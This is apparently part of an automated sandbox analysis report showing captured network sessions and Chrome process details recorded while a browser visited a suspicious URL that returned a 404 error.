                  2024-03-07 18:14:00 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: K3ojIMjMrEm4ZRi1.3Context: 4a79e7073ccc9114<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:14:00 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:14:00 UTC | 58 | IN | Data Ascii: MS-CV: EGmTR+S5dkGoy4evQ+LSEQ.0Payload parsing failed.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  13 | 192.168.2.6 | 49741 | 35.190.80.1 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:14:17 UTC | 528 | OUT | OPTIONS /report/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9 HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Origin: https://0xl45.ateros1.com
                  Access-Control-Request-Method: POST
                  Access-Control-Request-Headers: content-type
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:14:17 UTC | 336 | IN | HTTP/1.1 200 OK
                  Content-Length: 0
                  access-control-max-age: 86400
                  access-control-allow-methods: OPTIONS, POST
                  access-control-allow-origin: *
                  access-control-allow-headers: content-type, content-length
                  date: Thu, 07 Mar 2024 18:14:16 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  14 | 192.168.2.6 | 49742 | 35.190.80.1 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:14:17 UTC | 468 | OUT | POST /report/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9 HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Content-Length: 549
                  Content-Type: application/reports+json
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:14:17 UTC | 549 | OUT | Data Ascii: [{"age":56339,"body":{"elapsed_time":2964,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://0xl45.ateros1.com/OpLz16A1v5Gc/","sampling_fraction":1.0,"server_ip":"104.21.24.112","status_code":404,"type":"http.error"},"type":"ne
                  2024-03-07 18:14:18 UTC | 168 | IN | HTTP/1.1 200 OK
                  Content-Length: 0
                  date: Thu, 07 Mar 2024 18:14:17 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  15 | 192.168.2.6 | 49743 | 20.7.2.167 | 443
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:14:26 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: Ce7SXWbC50yl2lis.1Context: eabb611ac71efca6
                  2024-03-07 18:14:26 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:14:26 UTC | 1064 | OUT | Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: Ce7SXWbC50yl2lis.2Context: eabb611ac71efca6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:14:26 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: Ce7SXWbC50yl2lis.3Context: eabb611ac71efca6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:14:26 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:14:26 UTC | 58 | IN | Data Ascii: MS-CV: Kt+hvNbuz0Cu1DH6o53WfQ.0Payload parsing failed.


                  Target ID:0
                  Start time:19:13:08
                  Start date:07/03/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                  Imagebase:0x7ff684c40000
                  File size:3'242'272 bytes
                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  Target ID:2
                  Start time:19:13:09
                  Start date:07/03/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2204,i,10409208665149905087,14052384433586685165,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Imagebase:0x7ff684c40000
                  File size:3'242'272 bytes
                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:false

                  Target ID:3
                  Start time:19:13:13
                  Start date:07/03/2024
                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Imagebase:0x7ff684c40000
                  File size:3'242'272 bytes
                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  No disassembly